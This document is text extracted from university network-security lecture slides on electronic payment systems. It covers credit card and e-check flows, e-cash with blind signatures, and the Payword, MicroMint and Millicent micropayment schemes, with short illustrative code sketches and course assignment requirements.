◼ Zero-knowledge proofs of
identities in particular are
problematic
◼ The Grandmaster Problem
◼ The Mafia Problem
◼ etc.
Network Security
Van K Nguyen - HUT

Electronic Payment Systems: Overview


Agenda

◼ Electronic commerce concepts


◼ Electronic payment systems overview
◼ E-payment security
◼ Payment security services

◼ Material in this twin lecture is based on this


book: “Security Fundamental for Electronic
Commerce” by Vesna Hassler [Artech House and
Pedrick Moore, technical editor (2001) ]
Electronic commerce & secure transactions
◼ E-commerce can be defined as any transaction involving
some exchange of value over a communication network
❑ Business-to-business transactions, such as EDI (electronic data interchange)
◼ usually referred to as e-business
❑ Customer-to-business transactions, such as online shops on the Web
◼ customer-to-bank transactions as e-banking
❑ Customer-to-customer transactions, such as transfer btw e-wallets
❑ Customers/businesses-to-public administration transactions, such as
filing of electronic tax returns
◼ Also usually referred to as e-government.

◼ Here we care: Customer-to-business transactions


❑ on the electronic payment systems that provide a secure way to
exchange value between customers and businesses
Electronic Payment Systems
◼ E-payment systems evolved from traditional payment
systems
❑ Both have much in common
❑ But e-payment systems are much more powerful, because of the
advanced security techniques that have no analogs in traditional
payment systems.
◼ An e-payment system denotes any kind of network
service that provides the exchange of money for goods or
services:
❑ physical goods: books, CDs …
❑ electronic goods: e- documents, images, or music files
❑ traditional services: hotel or flight booking
❑ e-services, such as financial market analyses in electronic form
A typical e-payment system
◼ The provider runs a payment gateway
❑ reachable from the public network (Internet) and from a private
interbank clearing network.
❑ serves as an intermediary between the traditional payment
infrastructure and the e-payment infrastructure.
◼ In order to participate in, a customer and a merchant must
❑ be able to access the Internet
❑ register with the corresponding payment service provider.
❑ each have a bank account at a bank that is connected to the
clearing network.
◼ The customer’s bank is usually referred to as the issuer bank
◼ The term issuer bank denotes the bank that actually issued the payment
instrument (e.g., debit or credit card) that the customer uses for payment
◼ The acquirer bank acquires payment records (i.e., paper charge slips or e-data)
from the merchants
A typical e-payment system
◼ On purchase of goods/services,
C pays a certain amount of
money to M with debit/credit card.
❑ Before supplying goods/services, M
asks gateway G to authorize C and his
payment instrument (card number …)
❑ G contacts the issuer bank to check.
❑ If all fine, money is withdrawn (or
debited) from the C’s account and
deposited in (or credited to) M’s
account
❑ G notifies the merchant of the successful
payment ➔ M supplies the
ordered items to C.

◼ In some cases, e.g. for low-cost services, delivery can be made before
the actual payment authorization/transaction
Off-line vs. On-line
◼ Off-line systems: no current connections from the
customer/merchant to their respective banks
❑ M can’t authorize C with the issuer’s bank
❑ Also, it is difficult to prevent C from spending more money than
he actually possesses
➔ most proposed Internet payment systems are online.
◼ Online systems:
❑ Require online presence of an authorization server, which can be a
part of the issuer or the acquirer bank.
❑ requires more communication, but it is more secure than off-line
systems
◼ However, off-line still possible e.g. in some e-cash systems
❑ using some special strong cryptographic tools
Debit-based vs. credit-based systems

◼ In a credit-based payment system (e.g., credit


cards) the charges are posted to the payer’s
account
❑ The payer later pays the accumulated amounts to the
payment service.
◼ In a debit-based payment system
❑ e.g., debit cards, checks
❑ the payer’s account is debited immediately, that is, as
soon as the transaction is processed
Micro vs. macro

◼ Macro-payment: relatively large amounts of money can


be exchanged
◼ Micropayment system: small payments
❑ e.g., up to 5 euros
◼ The order of magnitude plays a significant role in the
design of a system and its security policies.
❑ It makes no sense to implement expensive security protocols to
protect e- coins of low value.
◼ In such a case, should instead prevent large-scale attacks in which huge
numbers of coins can be forged or stolen.
Payment instruments
◼ Traditional payment instruments
❑ Paper money, credit cards and checks
◼ E-payment systems introduced new instruments:
❑ electronic money (also called digital money)
❑ electronic checks
◼ Two main groups of instruments
❑ cash-like: money taken from account before payment
◼ payer withdraws a certain amount of money (e.g., paper money,
electronic money) from his account
❑ check-like: money taken from account after payment
◼ payer sends a payment order to the payee ➔ the money will be withdrawn from
the payer’s account and deposited into the payee’s.
◼ The payment order: paper e.g., a bank-transfer slip, or an e-document e.g. an e-
check.
Payment using credit cards

◼ Most popular
❑ The first credit cards were introduced decades ago (Diner’s Club
in 1949, American Express in 1958)
◼ Material
❑ For a long time, most are with magnetic stripes containing
unencrypted, read-only information
❑ Now, many are smart cards containing hardware devices (chips)
offering encryption and far greater storage capacity
❑ Recently even virtual credit cards (software electronic wallets),
such as one by Trintech Cable & Wireless
Typical credit card transaction
(1) C sends M credit card info (i.e., issuer, expiry date, number)
(2) M asks the acquirer bank A for authorization
(3) A checks with I - the issuer bank then A notifies M if approved.
(4) M sends the ordered goods/services to C
(5a) M presents the charge (or a batch of several transactions) to A
Typical credit
card transaction

(6) Settlement:
❑ A sends a settlement request to I; I places the money into an interbank settlement
account and charges the amount of sale to C’s credit card account.
(7) Notification
❑ At regular intervals (e.g., monthly) I notifies C of the transactions and their
accumulated charge
❑ C pays the charges by some other means (e.g., direct debit order, bank transfer,
check).
(5b) A has obtained the amount of sale from the interbank settlement
account and credited M’s account
Using credit cards: security problems

◼ Generally, fraudulent use of credit card numbers stems


from
❑ eavesdroppers
❑ dishonest merchants
◼ Credit card numbers can be protected against
❑ Eavesdroppers alone by encryption e.g. using SSL
❑ Dishonest merchants alone by using kind of pseudonyms of
credit card numbers
❑ Both eavesdroppers and dishonest merchants by encryption and
dual signatures
Electronic money
◼ Electronic representation of traditional money.
❑ A unit of e-money is usually referred to as an e- or digital coin
❑ Digital coins are “minted” i.e., generated by brokers
◼ If C wants to buy digital coins
❑ contacts a broker B, orders a certain amount of coins
❑ pays with “real” money
❑ C can make purchases from any M that accept the coins of that B
◼ M redeem at B’s the coins obtained from all C
❑ B takes back the coins and credits M’s account with real money.
◼ Typical electronic money transaction
❑ the issuer bank can be the broker at the same time.
❑ C & M must each have a current or checking account.
◼ The checking account is a transitional form between real money and e-money
Typical E-money transaction
(0) Coin withdrawal: C buys coins
and his checking account is
debited
(1) C uses the digital coins to
purchase in the Internet
(2) M sends C goods or services
❑ Since often used to buy low-value
services or goods M usually fills C’s
order before or even without payment
authorization

(3) Redemption: M then sends a request to the acquirer bank.


(4) Settlement: By using an interbank settlement mechanism similar,
the acquirer bank redeems the coins at the issuer bank and credits
M’s account with the equivalent amount
Electronic checks

◼ Electronic equivalents of traditional paper checks


◼ E-document that shows the following:
❑ Check number
❑ Payer’s name
❑ Payer’s account number and bank name
❑ Payee’s name
❑ Amount to be paid
❑ Currency unit used
❑ Expiration date
❑ Payer’s electronic signature
❑ Payee’s electronic endorsement
Typical e-check transaction
(1) C orders goods/services and
M sends back e- invoice
(2) As payment, C sends an
electronically signed e-check
❑ E-signature is a general term
that includes, among other
things, digital signatures
based on PKC
(3) As with paper checks, M
endorses the check

(4) Settlement: The issuer and the acquirer banks arrange transferring
the amount of sale from C’s account to M’s account.
(5) shipping/delivery
Electronic wallets

◼ Stored-value software or hardware devices


❑ loaded with specific value
◼ by increasing a currency counter
◼ by storing bit strings representing e-coins

◼ Current trend: using the smart card technology.


❑ CAFE project (Conditional Access For Europe), funded under the
European Community’s ESPRIT program
◼ a small portable computer with an internal power source
◼ a smart card

◼ Electronic money can be loaded online


◼ point-of-sale (POS) terminals
Smart card technology
◼ Plastic card with embedded microprocessor and memory
❑ used as either a credit card
❑ storage of electronic money or an electronic check device
❑ combination
◼ Smart card-based electronic wallets
❑ reloadable stored-value (prepaid) cards, for small payments
❑ Owner’s account is debited beforehand
❑ The owner can load the card at an ATM
❑ Shops with corresponding card readers at the cash register
◼ Examples
❑ Austrian Quick1 and Belgian Proton systems
❑ SET (Secure Electronic Transactions), an open specification for
secure credit card transactions over open networks
Electronic Payment Security

◼ The security problems of traditional payment systems


❑ Money can be counterfeited
❑ Signatures can be forged;
❑ Checks can bounce.
◼ Electronic payment systems have the same problems
and further:
❑ Digital documents can be copied perfectly and arbitrarily often
❑ Digital signatures can be produced by anybody who knows the
private key
❑ A payer’s identity can be associated with every payment
transaction
Electronic Payment Security
◼ E-commerce can not be widespread without additional
security measures which enable e-payment systems
◼ A properly designed e-payment system can provide better
security than traditional payment systems
◼ Three types of adversaries can be encountered:
❑ Outsiders eavesdropping and misusing the eavesdropped
data (e.g., credit card numbers)
❑ Malicious attackers sending forged messages to authorized users
◼ to cause abnormal system functioning
◼ or to steal the assets exchanged (e.g., goods, money)
❑ Dishonest users trying to obtain and misuse unauthorized payment
transaction data
Basic security requirements for e-
payment systems
◼ Payment authentication
❑ Both payers and payees must prove their payment identities
❑ This does not necessarily imply that a payer’s identity is revealed (as
when anonymity is required)
◼ Payment integrity
❑ Payment transaction data cannot be modifiable by unauthorized
principals
◼ Payment authorization
❑ Ensures that no money can be taken from a customer’s account
or smart card without his explicit permission
◼ Payment confidentiality
Payment Security Services
◼ Satisfying the security requirements of an e-payment
system takes more than just communications security
services
◼ A payment system may have conflicting security
requirements
❑ E.g., it may want anonymity for digital coins, but require identification of
double-spenders.
◼ An e-payment system for high-value transactions needs a
more elaborate (so more expensive) security policy than a
micropayment system
◼ Payment security services fall into three main groups
depending on the payment instrument used.
(Payment) transaction security services
◼ User anonymity
❑ protects against disclosure of a user’s identity in a network transaction;
◼ Location untraceability
❑ protects against disclosure of where a payment transaction originated;
◼ Payer anonymity
❑ protects against disclosure of a payer’s identity in a transaction;
◼ Payment transaction untraceability
❑ protects against linking of two different transactions of the same customer
◼ Confidentiality of payment transaction data
❑ selectively protects against disclosure of specific parts of transaction data to selected
principals from the group of authorized principals;
◼ Nonrepudiation of payment transaction messages
❑ protects against denial of the origin of transaction messages
◼ Freshness of payment transaction messages
❑ protects against replaying of payment transaction messages.
Digital money security

◼ Protection against double spending


❑ prevents multiple use of electronic coins
◼ Protection against forging of coins
❑ prevents production of fake digital coins by an
unauthorized principal
◼ Protection against stealing of coins
❑ prevents spending of digital coins by unauthorized
principals
E-check security

◼ The third group of services is based on the techniques


specific to payment systems using electronic checks as
payment instruments. There is an additional service
typical of electronic checks:

❑ Payment authorization transfer (proxy): makes possible the
transfer of payment authorization from an authorized principal to
another principal selected by the authorized principal.
Network Security

Electronic Payment Systems II: E-cash,


Micro-payment
[Source: Various on-line slides and
documents]
Agenda

◼ Electronic commerce concepts


◼ Electronic payment systems overview
◼ E-payment security
◼ Payment security services

◼ Material in this twin lecture is based on this


book: “Security Fundamental for Electronic
Commerce” by Vesna Hassler [Artech House and
Pedrick Moore, technical editor (2001) ]
Desirable Properties of Digital Money
◼ Universality
❑ Accepted every where
◼ Transferability (electronically)
◼ Divisibility
◼ Non-forgeability
◼ Privacy
❑ No one except involved parties know the amount
◼ Anonymity
❑ No one can identify the payer, even the banks
◼ Off-line
❑ no on-line verification needed
Known systems satisfy only some of these properties
Electronic Cash

◼ Primary advantage: small-medium


purchases
❑ Payments of items less than $10
❑ Credit card transaction fees make small
purchases unprofitable
❑ Micropayments
◼ Payments for items costing less than $1
Basic protocol
◼ Protocol basic steps:
1. C buys/withdraws e-cash from the Bank
2. B ➔ C: e-coins, while charging the given amount + fee
3. C ➔ M: e-coins
4. M ➔ Bank: ask to check e-coin validity
5. B ➔ M: verifies coin validity
◼ Parties still have to complete the transaction afterward:
❑ the merchant presents the e-cash to the issuing bank for deposit
once goods or services are delivered
[Figure: message flow 1–5 among Customer, Merchant, and Bank]
Electronic Cash Issues

◼ E-coins must be spent only once


◼ Users enjoy anonymity just like with real cash
❑ Safeguards must be in place to prevent
counterfeiting
◼ Divisibility and Convenience
◼ Complex transaction (checking with Bank)
❑ Atomicity problem
Two storage methods

◼ On-line
❑ Users do not have possession personally of e-
coins
❑ Trusted third party such as online bank holds
customers’ cash accounts
◼ Off-line
❑ Users can keep e-coins in smartcards or software
wallets
❑ Fraud and double spending require tamper-proof
special techniques
Advantages vs. Disadvantages

◼ Advantages of e-cash
❑ More efficient
❑ Lower transaction costs
❑ Available to anyone, unlike credit cards (which require
special authorization)
◼ Disadvantages
❑ Tax trail non-existent
❑ Money laundering, black mailing
❑ Susceptible to forgery
Electronic Cash Security

◼ Complex cryptographic algorithms prevent


double spending
❑ Anonymity is absolute but double-spenders are
fully traceable
◼ Serial numbers can allow tracing to prevent
money laundering
❑ Does not prevent double spending, since the
merchant or consumer could be at fault
Blind Signatures
◼ Goal
❑ to have the bank sign documents without knowing
what they are signing.

➔ Anonymity with authentication
How to sign with blind fold?
◼ How?
Basic: Sign anything

1. You encrypt the message

2. Send it to the bank

3. The bank signs the message and


returns it

4. You decrypt the signed message

5. You spend it
Cut and Choose
◼ Problem
How to make the bank trust the validity of the stuff in sealed envelope?
◼ Solution: the Cut-and-choose principle
1. Prepare n copies of the messages and
n different keys, and send them to the
bank

2. The bank requests the keys for n - 1 of
them, opens and verifies them. It
then signs the remaining one.

3. The bank sends back the signed


message, which can then be
decrypted and spent
Detecting Double Spending
Existing E-cash Systems

◼ E-cash not popular in U.S., but successful


in Europe and Japan
❑ Reasons for lack of U.S. success not clear
◼ Manner of implementation too complicated
◼ Lack of standards and interoperable software that
will run easily on a variety of hardware and software
systems
Existing E-cash Systems

◼ Checkfree
❑ Allows payment with online electronic checks
◼ Clickshare
❑ Designed for magazine and newspaper publishers
❑ Miscast as a micropayment-only system; micropayments are only one
of its features
❑ Purchases are billed to a user’s ISP, who in turn
bills the customer
Existing E-cash Systems

◼ CyberCash
❑ Combines features from cash and checks
❑ Offers credit card, micropayment, and check payment services
❑ Connects merchants directly with credit card processors to provide
authorizations for transactions in real time
◼ Because there are no processing delays, the customer cannot end up with
insufficient e-cash to pay for the transaction
◼ CyberCoins
❑ Stored in CyberCash wallet, a software storage mechanism located
on customer’s computer
❑ Used to make purchases between 25¢ and $10
❑ PayNow -- payments made directly from checking accounts
Existing E-cash Systems

◼ DigiCash
❑ Trailblazer in e-cash
❑ Allowed customers to purchase goods and services using
anonymous electronic cash
◼ Coin.Net
❑ Electronic tokens stored on a customer’s computer is used to make
purchases
❑ Works by installing special plug-in to a customer’s web browser
❑ Merchants do not need special software to accept eCoins.
❑ eCoin server prevents double-spending and traces transactions, but
consumer is anonymous to merchant
Micropayments
◼ Replacement of e-cash
❑ Cheaper: inexpensive to handle
❑ Recycling faster
❑ Easier to count, audit, verify
◼ Low transaction value, low cost for transaction
processing (e.g. less than $1)
◼ Best suited to small transactions
❑ Beverages
❑ Phone calls
❑ Tolls, transportation, parking
❑ Copying
❑ Internet content
❑ Lotteries, gambling
Micropayments
◼ Prepaid cards
❑ Issued by non-banks
❑ Represent a call on future service
❑ Not money, since usable only with one seller
◼ Electronic purse (wallet)
❑ Issued by a bank
❑ Holds a representation of real money
❑ In form of a card (for face-to-face or Internet use)
◼ Loading (charging) the card with money
◼ Payment: removing money from the card
◼ Clearance: money ➔ seller’s account
◼ Saving in choosing technologies
❑ Selectively verifying (e.g. not every transaction)
❑ Light-weight cryptographic tools
◼ Float-preserving methods
❑ Prepayment
❑ Grouping: aggregate purchases (amortizing)
❑ Provide float to processor
◼ Partial anonymity (individual purchases disguised)
Remote Micropayments
◼ Remote micropayments
❑ Buyer is remote from the seller
◼ Can’t insert card into vendor’s machine
◼ No physical goods, only information goods
◼ if micropayment will work, goods must be cheap, e.g. $0.01
❑ Traditional payment is too expensive
◼ Subscriptions, credit cards, checks, ACH or even PayPal

◼ Examples such as payment for view of


❑ web pages, stock quotes, news articles, weather report,
directory lookup
◼ Just required features are
❑ instant service
❑ transactions as cheap as 1¢ but in large number
❑ reasonable profit to payment provider
Remote Micropayment Parties

◼ Users (buyers), running Web browsers
◼ Vendors (sellers), running Web servers
◼ Brokers (intermediaries), running broker servers
❑ issue “scrip” (virtual money) to users
❑ redeem scrip from vendors for real money
◼ Assumptions
❑ User-Broker relationship is long-term
❑ Vendor-Broker relationship is long-term
❑ User-Vendor relationship is short-term
Micropayment Efficiency
◼ Providers need to process a peak load of at least 2500
transactions/second
❑ Using light-weight crypto tools
◼ Public-key cryptography is expensive: 1 RSA signature verification ≈ 1,000
symmetric encryptions ≈ 10,000 hashes
❑ Need to minimize Internet traffic
◼ Servers must be up
◼ More servers required, longer queues, lost packet delay
◼ Remove the provider from the process (user + vendor only)

◼ For small payment amounts, perfection is not needed


❑ Losing an occasional micropayment is not a big matter
❑ All we need is to keep micropayment fraud low
Major Ideas
◼ Micropayment systems must be fast and cheap
◼ They MUST lack features of higher-value payment
systems
◼ Use of hashing instead of cryptography
◼ Micropayment parties: buyer, seller, broker
◼ Payword user generates his own coins!
◼ Fraud is not a serious problem with micropayments
Payword Concept
◼ Secure payment scripts by using hash functions
❑ As a light-weight crypto tool, hash functions are easy to
compute, but their one-way property is enough to protect
against stealing of small values
◼ Suppose we need N “coins”
❑ Start with a random number WN
❑ Hash it N times to form W0:

WN → WN-1 → WN-2 → • • • → W1 → W0
where WN-1 = H(WN), WN-2 = H(WN-1), ..., W1 = H(W2), W0 = H(W1)

❑ These N numbers will be used as “coins”, or paywords, each
of which is worth one unit
❑ Vendor receives W0 to start
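A sketch of the chain construction and the vendor's check in Python, assuming SHA-256 as the hash H; the names and chain length are illustrative.

```python
import hashlib, os

def H(x: bytes) -> bytes:
    return hashlib.sha256(x).digest()

def make_chain(n_coins: int):
    """User: pick a random W_N and hash backwards down to the root W_0."""
    chain = [os.urandom(32)]                 # W_N
    for _ in range(n_coins):
        chain.append(H(chain[-1]))           # W_{i-1} = H(W_i)
    chain.reverse()                          # chain[i] is now W_i
    return chain

def vendor_verify(w0: bytes, w_i: bytes, i: int) -> bool:
    """Vendor: hash the spent payword i times and compare with the committed root W_0."""
    for _ in range(i):
        w_i = H(w_i)
    return w_i == w0

chain = make_chain(100)                      # 100 paywords, each worth one unit
w0 = chain[0]                                # the root sent in the signed commitment
assert vendor_verify(w0, chain[3], 3)        # spending payword W_3
assert not vendor_verify(w0, os.urandom(32), 3)   # a forged payword fails
```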
Payword
◼ Based on these “paywords” strings that will
be accepted by vendors for purchases
❑ First, the user authenticates himself to a broker with
one signature verification, paying “real” money for
paywords
❑ User sets up with the broker a linked chain of
paywords to be used with a specific vendor
◼ Linking allows authentication of the paywords to be
aggregated, so the per-payment cost is very cheap
❑ User pays vendor by revealing paywords to vendor
Payword
◼ User sets up Payword account with a broker (pays
real money)
❑ Broker issues user a “virtual card” (certificate)
◼ broker name, user name, user IP address, user public key
❑ Certificate authenticates user to vendor
❑ User creates payword chains (typical length: 100 units)
specific to a vendor
Buying Paywords
◼ User visits broker over secure channel (e.g. SSL),
giving coordinates of bank account or credit card:
U, AU, PKU, TU, $U
(user name, user address, user public key, user certificate, coordinates of bank
account or credit card)

◼ Broker issues a subscription card, signed with the broker’s private key SKB:

CU = { B, U, AU, PKU, E, IU } SKB
(B = broker name, E = expiration date, IU = user information: card #, credit limit)
◼ Vendor will deliver goods only to AU
Making Payment
◼ Commitment to a payword chain = promise by user to
pay vendor for all paywords given out by user before the
date in D (expiration date)
❑ N = value in jetons needed for purchases (1 payword = 1 jeton)
❑ WN = last payword, a random value chosen by the user
◼ User creates the payword chain backwards by hashing WN:
WN-1 = H(WN); WN-2 = H(WN-1) = H(H(WN)), etc., giving
W = { W0, W1, . . . , WN-1, WN }
(easy to compute from right to left, difficult to compute from left to right)
◼ User “commits” this chain to a vendor by sending the payword commitment
M = { V, CU, W0, D, IM } SKU
where V is the vendor name, CU the user’s certificate, W0 the “first” payword,
D the expiration date, IM extra information (value of chain), and SKU the
user’s private key used to sign
❑ M is vendor-specific and user-specific (of no use to anyone else); this is the
expensive step, since it requires a digital signature

Information Security by Van K Nguyen


Hanoi University of Technology
Making Payment, cont.
◼ The vendor can use PK_U and PK_B to verify the commitment and confirm that U is currently authorized to spend paywords.
◼ The user “spends” paywords with the vendor in order W_1, W_2, . . . , W_N. To spend payword W_i, the user sends the vendor the unsigned token P = { W_i, i }.
◼ To verify that P is legitimate, the vendor hashes W_i i times to obtain W_0. If this matches W_0 in the commitment, the payment is good.
◼ If V stores the last payword value seen from U, only one hash is needed: if the last accepted payword was W_i, then when the vendor receives W_{i+1}, it can hash it once and compare the result with W_i (see the sketch below).
◼ P does not have to be signed because the hash is one-way.
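A minimal vendor-side sketch of this check (illustrative names; SHA-256 again stands in for the scheme's hash H):

# Vendor-side verification sketch: one hash per payment once the last
# accepted payword (initially W_0 from the commitment) is known.
import hashlib

def H(x):
    return hashlib.sha256(x).digest()

def accept_payment(last_accepted, i_last, w_i, i):
    """Accept payword w_i (claimed index i) given the last accepted payword."""
    if i != i_last + 1:
        return False                     # simple policy: spend in order
    return H(w_i) == last_accepted       # W_{i-1} must equal H(W_i)

# usage, continuing the chain sketch above:
# ok = accept_payment(W0, 0, chain[1], 1)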

Information Security by Van K Nguyen


Hanoi University of Technology
Settlement with Payword
◼ Even if vendor has no relationship with broker B, can still
verify user paywords (only need broker’s public key)
◼ For vendor to get money from B requires relationship
◼ Vendor sends broker B a reimbursement request for each user that sent paywords, containing M and W_L (the last payword received by the vendor)
◼ Broker verifies each commitment using PK_U and performs L hashes to go from W_L to W_0
◼ Broker pays V, aggregates commitments of U and bills
U’s credit card or debits money from U’s bank account

Information Security by Van K Nguyen


Hanoi University of Technology
Payword Payment Properties
◼ Payment and verification by vendor are offline (no use of
a trusted authority).
◼ Payment token P does not reveal the goods
◼ Fraud by user (issuing paywords without paying for
them) will be detected by the broker; loss should be
small
◼ Vendor keeps record of unexpired paywords to guard
against replay

Information Security by Van K Nguyen


Hanoi University of Technology
Major Ideas
◼ Micropayment systems must be fast and cheap
◼ They MUST lack features of higher-value payment
systems
◼ Use of hashing instead of public-key cryptography
◼ Micropayment parties: buyer, seller, broker
◼ Payword user generates his own coins!
◼ Fraud is not a serious problem with micropayments

Information Security by Van K Nguyen


Hanoi University of Technology
MicroMint
◼ Brokers produce “coins” having short lifetimes, sell
coins to users
◼ Users pay vendors with coins
◼ Vendors exchange the coins with brokers for “real”
money

[Figure: MicroMint money flows: the customer purchases new coins from the broker and returns unused coins for new ones; the customer spends coins with the vendor in exchange for information; the vendor exchanges collected coins with the broker for other forms of value. Source: Sherif]

Information Security by Van K Nguyen


Hanoi University of Technology
Minting Coins in MicroMint
◼ Idea: make coins easy to verify, but difficult to create
(so there is no advantage in counterfeiting)
◼ In MicroMint, coins are represented by hash-function
collisions, values x, y for which H(x) = H(y)
◼ If H(•) produces an n-bit hash, we have to try about 2^(n/2) values of x to find a first collision
◼ Trying c•2^(n/2) values of x yields about c^2 collisions
◼ Collisions become cheaper to generate after the first
one is found

Information Security by Van K Nguyen


Hanoi University of Technology
Coins as k-way Collisions
◼ A k-way collision is a set { x1, x2, . . ., xk } with H(x1) = H(x2) = . . . = H(xk)
◼ It takes about 2^(n(k-1)/k) values of x to find a k-way collision
◼ Trying c•2^(n(k-1)/k) values of x yields about c^k collisions
◼ If k > 2, finding a first collision is slow, but subsequent collisions come fast
◼ If a k-way collision { x1, x2, . . ., xk } represents a coin, it is easily verified by computing H(x1), H(x2), . . ., H(xk) (see the minting sketch below)
◼ A broker can easily generate 10 billion coins per
month using one machine
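A toy minting sketch of this idea (a 16-bit truncated hash is used only so the demo finishes instantly; a real broker would use a much larger n and month-long computations):

# Toy MicroMint minting sketch: collect k-way collisions of a truncated hash.
import hashlib, os
from collections import defaultdict

N_BITS = 16          # toy parameter; a real broker uses a much larger n

def h(x):
    # Truncated hash standing in for the broker's n-bit function H.
    return int.from_bytes(hashlib.sha256(x).digest(), "big") >> (256 - N_BITS)

def mint(k=4, want=5):
    buckets, coins = defaultdict(list), []
    while len(coins) < want:
        x = os.urandom(8)
        bucket = buckets[h(x)]
        bucket.append(x)
        if len(bucket) == k:             # k values with the same hash: one coin
            coins.append(tuple(bucket))
            bucket.clear()
    return coins

coins = mint()
print(len(coins), "coins minted")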

Information Security by Van K Nguyen


Hanoi University of Technology
Selling MicroMint Coins
◼ Broker generates 10 billion coins and stores (x, H(x))
for each coin, having a validity period of one month
◼ The function H changes at the start of each month
◼ Broker sells coins { x1, x2, . . ., xk } to users for “real”
money, records who bought each coin
◼ At end of month, users return unused coins for new
ones

Information Security by Van K Nguyen


Hanoi University of Technology
Spending MicroMint Coins
◼ User sends vendor a coin { x1, x2, . . ., xk }
◼ Vendor verifies validity by checking that H(x1) = H(x2) = . . . = H(xk) (k hash computations)
◼ Valid but double-spent coins (previously used with a different vendor) cannot be detected at this point (see the settlement sketch below)
◼ At end of day, vendor sends coins to broker
◼ Broker verifies coins, checks validity, checks for
double spending, pays vendor
◼ (Need to deal with double spending at this point)
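A sketch of the broker-side settlement check described above (same toy 16-bit hash as in the minting sketch; names are illustrative, and persistent storage would replace the in-memory set):

# Broker-side settlement sketch: re-verify each coin, detect double spending.
import hashlib

def h(x, n_bits=16):
    return int.from_bytes(hashlib.sha256(x).digest(), "big") >> (256 - n_bits)

redeemed = set()     # coins already paid out to some vendor

def broker_redeem(coin, k=4):
    key = tuple(sorted(coin))
    if len(coin) != k or len({h(x) for x in coin}) != 1:
        return "invalid"
    if key in redeemed:
        return "double-spent"
    redeemed.add(key)
    return "pay vendor"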

Information Security by Van K Nguyen


Hanoi University of Technology
Detecting MicroMint Forgery
◼ A forged coin is a k-way collision { x1, x2, . . ., xk }
under H(•) that was not minted by broker
◼ Vendor cannot determine this in real-time
◼ Small-scale forgery is impractical
◼ Forged coins become invalid after one month
◼ New forgery can’t begin before new hash is announced
◼ Broker can issue recall before the month ends
◼ Broker can stay many months ahead of forgers

Information Security by Van K Nguyen


Hanoi University of Technology
Millicent
◼ Vendors produce vendor-specific “scrip”, sell to brokers
for “real” money at discount
◼ Brokers sell scrip from many vendors to many users
◼ Scrip is prepaid: promise of future service from vendor
◼ Users “spend” scrip with vendors, receive change

[Figure: Millicent money flows: the user buys broker scrip ($, weekly) and exchanges broker scrip for vendor scrip as needed; brokers pay vendors for vendor scrip ($$$, monthly); the user spends vendor scrip with the vendor for information (¢, daily), receiving change in the message header. Source: Compaq]

Information Security by Van K Nguyen


Hanoi University of Technology
Millicent
◼ Broker
❑ issues broker scrip to user
❑ exchanges broker scrip for vendor scrip
❑ interfaces to banking system
❑ collects funds from users
❑ pays vendors (less commission)
◼ User
❑ buys broker scrip from brokers
❑ spends by obtaining vendor-specific scrip from broker
◼ Vendor
❑ sells scrip to brokers
❑ accepts vendor scrip from users
❑ gives change to users in vendor scrip

Information Security by Van K Nguyen


Hanoi University of Technology
MilliCent Components
◼ Wallet
❑ integrated with browser as a “proxy”
❑ user interface (content, usage)
◼ Vendor software
❑ easy to integrate as a web relay
❑ utility for price management
◼ Broker software
❑ handles real money
[Figure: the user’s wallet exchanges new and spent tokens with the vendor server; the wallet and vendor server exchange real money ($) with the broker server]

Information Security by Van K Nguyen


Hanoi University of Technology
MilliCent System Architecture
[Figure: MilliCent system architecture: brokers (tens?) run broker servers; vendors (thousands) run vendor servers (price configurator, price file, document tree, site map) in front of their web servers; users (millions of consumers) run browsers with wallets, speaking HTTP to vendor and broker servers and keeping contents in the browser cache]

Information Security by Van K Nguyen


Hanoi University of Technology
Millicent Scrip Verification
• Token attached to HTTP requests
• Scrip can not be:
– Spent twice
– Forged
– Stolen
• Scrip is validated:
– By each vendor, on the fly
– Low computational overhead
– No network connection
– No database look up
[Figure: the client web browser presents scrip to the vendor web server; the broker server is contacted only to obtain scrip]

Information Security by Van K Nguyen


Hanoi University of Technology
MilliCent Scrip

Example scrip fields: Vendor = wellsfargo.com; Value = 0.005usd; ID# = 0081432; Cust ID# = 101861; Expires = 19961218; Props = {co=us/st=ca}; Stamp = 1d7f4a734b7c02282e48290f04c20 (the stamp is derived from the other fields together with a secret held by the vendor, so tampering is detectable; see the sketch below)
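A hedged sketch of the stamp idea only (the real Millicent field layout, hash, and secret handling differ; names here are illustrative): the vendor can validate scrip locally by recomputing a keyed hash over the scrip body with a master secret it holds.

# Illustrative scrip-stamp check, not the literal Millicent algorithm.
import hashlib

def stamp(scrip_body: str, master_secret: bytes) -> str:
    return hashlib.sha256(master_secret + scrip_body.encode()).hexdigest()

def scrip_is_valid(scrip_body: str, presented_stamp: str, master_secret: bytes) -> bool:
    return stamp(scrip_body, master_secret) == presented_stamp

body = "wellsfargo.com/0.005usd/0081432/101861/19961218/{co=us/st=ca}"
secret = b"vendor-master-secret"           # known only to the vendor
s = stamp(body, secret)
print(scrip_is_valid(body, s, secret))     # True; any altered field breaks it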

Information Security by Van K Nguyen


Hanoi University of Technology
Vendor Server
◼ Vendor server acts as a proxy for the real Web server
◼ Vendor server handles all requests:
❑ Millicent
❑ relay to web-server
◼ Millicent processing:
❑ Validates scrip and generates change
❑ Sells subscriptions
❑ Handles replays, cash-outs, and refunds
[Figure: the vendor server (with price file and document tree) sits at the vendor site in front of the vendor web server]

Information Security by Van K Nguyen


Hanoi University of Technology
Major Ideas
◼ Micropayment systems must be fast and cheap
◼ They MUST lack features of higher-value payment
systems
◼ Use of hashing instead of public-key cryptography
◼ Micropayment parties: buyer, seller, broker
◼ MicroMint’s model of minting coins
❑ High overhead to prevent counterfeiting
◼ Fraud is not a serious problem with micropayments

Information Security by Van K Nguyen


Hanoi University of Technology
Major Assignment Requirements
◼ Requirements for the assignment outline (due end of week 10):
❑ Project title
❑ An abstract (one paragraph) summarizing the content of the report.
❑ Plan and detailed contents
◼ Structure of sections/subsections
◼ Title of each section
◼ Tasks of each team member in each section
◼ Keywords for the section
◼ A one-paragraph abstract of the section.
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 47
◼ Report (submit in week 13; present in weeks 14 and 15)
❑ Use exactly the section structure given in the outline
❑ Team members carry out the work as assigned
❑ Write the text yourself; do not copy whole paragraphs or sentences without clearly citing the source.
❑ Reports on the same topic will be graded more strictly, under separate criteria; similar reports receive low marks; if two groups’ reports are too similar, the score will be split between them (e.g., both get 3 = 6/2)
❑ Invest the report in the parts containing your own analysis and evaluation (judgments, comparisons); copied knowledge (even if translated) has very little value. A strong report shows independent thinking and the ability to synthesize and analyze.
❑ Writing style: learn from scientific papers published in professional journals and conferences
❑ The report need not be long: no more than 20 pages
❑ Prepare at most 30 presentation slides (for a 15-25 minute talk)
